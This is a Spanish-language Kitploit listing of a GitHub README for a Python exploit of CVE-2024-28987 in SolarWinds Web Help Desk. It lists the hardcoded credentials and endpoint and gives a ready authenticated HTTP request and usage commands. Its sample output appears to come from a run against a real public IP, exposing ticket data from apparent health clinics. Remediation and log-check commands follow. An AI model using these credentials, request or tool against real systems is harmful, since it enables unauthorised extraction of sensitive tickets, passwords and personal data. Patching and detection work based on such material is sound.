Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-28987 — **CVE-2024-28987** es una vulnerabilidad crítica en SolarWinds Web Help Desk (WHD) que permite a atacantes remotos acceder a información sensible de los tickets mediante **credenciales codificadas**. Esta vulnerabilidad tiene una **puntuación CVSS de 9.1 (Crítica)** y está siendo explotada activamente. | Kitploit
Herramientas/GitHubGitHub/darabium/cve-2024-28987
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebExfiltración de DatosPruebas de Penetración
GitHubdarabium/cve-2024-28987

CVE-2024-28987

Ver Repositorio
13hace 1 mesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →

Acerca de

**CVE-2024-28987** es una vulnerabilidad crítica en SolarWinds Web Help Desk (WHD) que permite a atacantes remotos acceder a información sensible de los tickets mediante **credenciales codificadas**. Esta vulnerabilidad tiene una **puntuación CVSS de 9.1 (Crítica)** y está siendo explotada activamente.

Compartir

CVE-2024-28987 - Exploit de Credenciales Hardcodeadas en SolarWinds Web Help Desk

Python License CVE CVSS

⚠️ DESCARGO DE RESPONSABILIDAD: Esta herramienta es solo para fines educativos y de pruebas de seguridad autorizadas. El acceso no autorizado a sistemas informáticos es ilegal. Utiliza esta herramienta únicamente en sistemas que te pertenezcan o tengan permiso explícito para probar.


📋 Resumen

CVE-2024-28987 es una vulnerabilidad crítica en SolarWinds Web Help Desk (WHD) que permite a atacantes remotos acceder a información sensible de tickets mediante credenciales hardcodeadas. Esta vulnerabilidad tiene una puntuación CVSS de 9.1 (Crítica) y se está explotando activamente en la naturaleza.

Detalles de la Vulnerabilidad

AtributoValor
ID CVECVE-2024-28987
Puntuación CVSS9.1 (Crítica)
CWECWE-798 (Credenciales Hardcodeadas)
Productos AfectadosSolarWinds Web Help Desk ≤ 12.8.3 Hotfix 1
Versión Parcheada12.8.3 Hotfix 2
ExplotaciónExplotada activamente en la naturaleza
Añadido al KEV de CISA15 de octubre de 2024

Impacto

Un atacante no autenticado puede:

  • Acceder a todos los tickets de soporte que contienen información sensible
  • Ver contraseñas temporales, solicitudes de restablecimiento y credenciales de servicios compartidos
  • Realizar operaciones CRUD en los tickets a través del endpoint /OrionTickets
  • Potencialmente moverse lateralmente a otros sistemas de la red

🔧 Características

  • ✅ Detección automática de vulnerabilidad - Prueba las credenciales hardcodeadas
  • ✅ Extracción de tickets - Recupera todos los tickets de sistemas vulnerables
  • ✅ Escaneo de datos sensibles - Identifica contraseñas, credenciales, PII y datos médicos
  • ✅ Múltiples formatos de salida - JSON y JSONL para conjuntos de datos grandes
  • ✅ Vista previa interactiva - Muestra los primeros 3 tickets antes de la extracción
  • ✅ Cero dependencias - Utiliza solo la biblioteca estándar de Python
  • ✅ Salida colorida - Legibilidad mejorada con colores ANSI
  • ✅ Manejo de errores - Gestión correcta de errores de conexión

🚀 Inicio Rápido

Requisitos Previos

  • Python 3.6 o superior
  • ¡No se requieren dependencias externas!

Instalación

root@kitploit:~
# Clone the repository
git clone https://github.com/Darabium/CVE-2024-28987.git
cd CVE-2024-28987

# Make the script executable
Usage
bash
# With target URL as argument
python3 cve-2024-28987.py http://target-ip:port

# Interactive mode (will prompt for target)
python3 cve-2024-28987.py

# Example with a vulnerable target
python3 cve-2024-28987.py http://192.168.1.100:8098

📊 Ejemplo de Salida

root@kitploit:~
$ python3 cve-2024-28987.py http://138.94.193.65:8098

    ╔══════════════════════════════════════════════════════════════════╗
    ║                                                                  ║
    ║   ██████╗██╗   ██╗███████╗    ██████╗  ██████╗ ██╗  ██╗███████╗ ║
    ║  ██╔════╝██║   ██║██╔════╝    ╚════██╗██╔═████╗██║  ██║██╔════╝ ║
    ║  ██║     ██║   ██║█████╗       █████╔╝██║██╔██║███████║█████╗   ║
    ║  ██║     ╚██╗ ██╔╝██╔══╝      ██╔═══╝ ████╔╝██║██╔══██║██╔══╝   ║
    ║  ╚██████╗ ╚████╔╝ ███████╗    ███████╗╚██████╔╝██║  ██║███████╗ ║
    ║   ╚═════╝  ╚═══╝  ╚══════╝    ╚══════╝ ╚═════╝ ╚═╝  ╚═╝╚══════╝ ║
    ║                                                                  ║
    ║         CVE-2024-28987 - SolarWinds Web Help Desk               ║
    ║         Hardcoded Credentials Vulnerability                      ║
    ║                                                                  ║
    ╠══════════════════════════════════════════════════════════════════╣
    ║  GitHub: https://github.com/Darabium                        ║
    ╚══════════════════════════════════════════════════════════════════╝

[*] Checking http://****:**/helpdesk/WebObjects/Helpdesk.woa/ra/OrionTickets/
[+] Target is VULNERABLE!
[+] Found 42 tickets

======================================================================
[📋] Ticket Preview (First 3 tickets)
======================================================================

Ticket #1
  ├── ID: 5690
  ├── Client: UBS Portao Vermelho
  ├── Status: Open
  ├── Detail: BOA TARDE ENCAMINHO SOLICITAÇÃO DE MATERIAIS DA ODONTO

Ticket #2
  ├── ID: 5691
  ├── Client: UBS Centro
  ├── Status: In Progress
  ├── Detail: ALCOOL 70% - Solicitação de material de limpeza

======================================================================
[🔐] Scanning for Sensitive Data
======================================================================

[!] Potential PASSWORD data found in ticket #5723
    └── detail: Please reset my password for system access...

[?] Do you want to extract ALL tickets to file? [y/N]: y

[*] Saving to: 138_94_193_65_8098_tickets.json
[✓] Successfully saved 138_94_193_65_8098_tickets.json
[*] File size: 42,847 bytes
[*] Total tickets: 42

[*] Done!

GitHub: https://github.com/Darabium

📁 Estructura de Archivos

root@kitploit:~
CVE-2024-28987/

├── cve-2024-28987.py          # Main exploit script

├── README.md                   # This file

└── LICENSE                     # MIT License

Archivos de Salida

Cuando extraigas tickets, se crean los siguientes archivos:

root@kitploit:~
# Standard JSON format (always created)
138_94_193_65_8098_tickets.json

# JSONL format (created if > 100 tickets)
***_tickets.jsonl

🔍 Detalles Técnicos

Credenciales Hardcodeadas

root@kitploit:~
USERNAME = "helpdeskIntegrationUser"
PASSWORD = "dev-C4F8025E7"

Endpoint Afectado

root@kitploit:~
/helpdesk/WebObjects/Helpdesk.woa/ra/OrionTickets/

Ejemplo de Solicitud HTTP

root@kitploit:~
GET /helpdesk/WebObjects/Helpdesk.woa/ra/OrionTickets/ HTTP/1.1
Host: vulnerable-target:8098
Authorization: Basic aGVscGRlc2tJbnRlZ3JhdGlvblVzZXI6ZGV2LUM0ZjgwMjVFNw==
Content-Type: application/x-www-form-urlencoded

🛡️ Remediación

Acciones Inmediatas

  • Actualiza de inmediato a SolarWinds Web Help Desk versión 12.8.3 Hotfix 2 o posterior
  • Revisa los registros en busca de accesos sospechosos al endpoint /OrionTickets
  • Monitorea accesos no autorizados a los datos de tickets
  • Restablece todas las credenciales que puedan haber estado expuestas en los tickets
  • Revisa todos los tickets de soporte para detectar posibles fugas de datos

Comandos de Detección

root@kitploit:~
# Check for exploitation attempts in logs
grep -i "OrionTickets" /var/log/webhelpdesk/access.log

# Check for unauthorized access patterns
grep -i "helpdeskIntegrationUser" /var/log/webhelpdesk/access.log

# Check current version
cat /opt/WebHelpDesk/version.txt

🚨 Aviso KEV de CISA

Esta vulnerabilidad ha sido añadida al catálogo de Vulnerabilidades Explotadas Conocidas (KEV) de CISA. Se requiere que las organizaciones apliquen el parche antes de la fecha límite especificada.

  • Fecha de adición: 15 de octubre de 2024
  • Acción requerida: Aplicar las actualizaciones según las instrucciones del proveedor
  • Fecha límite: 5 de noviembre de 2024 (21 días)

📚 Referencias

  • NVD CVE-2024-28987
  • Catálogo KEV de CISA
  • Aviso de Seguridad de SolarWinds
  • PEP 668 - Gestión de Entornos Externos

🤝 Contribuciones

¡Las contribuciones son bienvenidas! No dudes en enviar pull requests o abrir issues.

Pautas

  • Haz un fork del repositorio
  • Crea tu rama de características (git checkout -b feature/AmazingFeature)
  • Haz commit de tus cambios (git commit -m 'Add some AmazingFeature')
  • Sube la rama (git push origin feature/AmazingFeature)
  • Abre una Pull Request

📝 Licencia

Este proyecto está licenciado bajo la Licencia MIT; consulta el archivo LICENSE para más detalles.

⚡ Autor

Darabium - Trabajo inicial - GitHub

⚠️ Notas Importantes

  • Esta herramienta está destinada a la investigación de seguridad y fines educativos
  • No la utilices en sistemas que no te pertenezcan o para los que no tengas permiso explícito de prueba
  • El autor no es responsable del mal uso de esta herramienta
  • Sigue siempre las prácticas de divulgación responsable
  • Respeta las leyes de privacidad y protección de datos de tu jurisdicción

🌟 Historial de Estrellas

Si encuentras útil esta herramienta, ¡por favor dale una ⭐ en GitHub!

📞 Soporte

  • Abre un issue en GitHub para reportar errores
  • Para problemas de seguridad, contacta directamente a través de GitHub

Hecho con ❤️ para Darabium

Descargar herramienta